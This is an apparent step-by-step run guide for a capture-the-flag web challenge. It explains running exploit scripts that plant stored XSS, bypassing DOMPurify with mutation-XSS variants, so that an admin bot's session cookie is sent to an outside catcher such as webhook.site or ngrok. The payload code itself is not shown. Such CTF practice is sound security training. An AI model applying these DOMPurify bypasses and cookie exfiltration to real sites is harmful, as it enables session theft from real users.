# 🚀 READY TO EXPLOIT - Step by Step ## ✅ Setup Complete! The remote server is UP and accessible: - Target: https://unrealistic-1-7e47fbb90382563c.chals.uoftctf.org - All scripts are ready to run - Connection tested successfully ## 🎯 THREE WAYS TO GET THE FLAG ### Method 1: webhook.site (EASIEST - Recommended) ```bash # 1. Open https://webhook.site in your browser # 2. Copy your unique URL # 3. Run the exploit: python exploit_remote.py # 4. When prompted, paste your webhook URL # 5. Choose option 1 (mxss1) or 10 (try all) # 6. Check webhook.site for incoming request # 7. Copy the 'flag' parameter value (the JWT) # 8. Decode it: python decode_jwt.py ``` ### Method 2: Local server + ngrok ```bash # Terminal 1 - Start local webhook receiver: python webhook_server.py # Terminal 2 - Expose to internet: ngrok http 8080 # Terminal 3 - Run exploit: python exploit_remote.py # Use the ngrok HTTPS URL # Watch Terminal 1 for auto-decoded flag! ``` ### Method 3: RequestBin ```bash # 1. Go to https://requestbin.com and create a bin # 2. Copy the URL # 3. Run: python exploit_remote.py # 4. Paste RequestBin URL when prompted # 5. Check RequestBin for the request ``` ## 📋 Expected Flow ``` [Step 1] Register account on remote server → ✓ [Step 2] Send malicious message to admin → ✓ [Step 3] Trigger admin bot → ✓ [Step 4] Bot logs in as admin → (server side) [Step 5] Bot visits /flag → (flag in JWT) [Step 6] Bot visits /inbox → (sees your message) [Step 7] XSS bypass executes → (redirects to webhook) [Step 8] Webhook receives cookie → ✓ YOU WIN! [Step 9] Decode JWT to get flag → ✓ SUBMIT FLAG! ``` ## 🔧 If First Attempt Fails The exploit tries different DOMPurify bypass techniques: 1. **mxss1** - Form/Math namespace confusion (primary) 2. **mxss2** - Form/Math with different exfil method 3. **svg1** - SVG CDATA escape 4. **svg2** - SVG foreignObject 5. **mathml1** - MathML style escape 6. **clobber** - DOM clobbering attack 7. **noscript** - Noscript mutation 8. **template** - Template element bypass Try option **10** to test all of them automatically! ## 🎓 What You're Exploiting **Vulnerability**: Stored XSS via DOMPurify 3.3.1 bypass The app uses DOMPurify to sanitize messages, but certain mXSS (mutation XSS) techniques can bypass it by confusing the HTML parser through namespace collisions (SVG/MathML/HTML mixing). **The payload** redirects the admin's browser to your webhook with their session cookie (containing the flag) in the URL. ## ⚡ Quick Commands ```bash # Test connection python test_connection.py # Run exploit (interactive) python exploit_remote.py # Decode captured JWT python decode_jwt.py eyJhbGci... # Run webhook server (if using ngrok) python webhook_server.py ``` ## 🏁 Success Looks Like In your webhook, you'll see: ``` GET /?flag=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxIiwiaWF0IjoxNzM2NDYwMTIzLCJleHAiOjE3MzY0NjczMjMsImZsYWciOiJ1b2Z0Y3Rme... ``` Decode that JWT and you'll find: ```json { "sub": "1", "iat": 1736460123, "exp": 1736467323, "flag": "uoftctf{actual_flag_here}" } ``` ## 🆘 Troubleshooting | Issue | Solution | |-------|----------| | No webhook request | Wait 15-20 seconds, try different payloads | | Bot trigger fails | Wait a bit, register new account, try again | | Connection timeout | Check internet, verify server is still up | | Webhook not working | Use webhook.site instead of local server | | JWT won't decode | Make sure you copied the full token | ## 🎯 Ready? Let's Go! **Recommended first try:** 1. Open https://webhook.site - copy your URL 2. Run: `python exploit_remote.py` 3. Paste webhook URL 4. Choose: `10` (try all payloads) 5. Wait and watch webhook.site 6. Decode any JWT you receive **Time estimate**: 5-10 minutes for all payloads to run Good luck! 🍀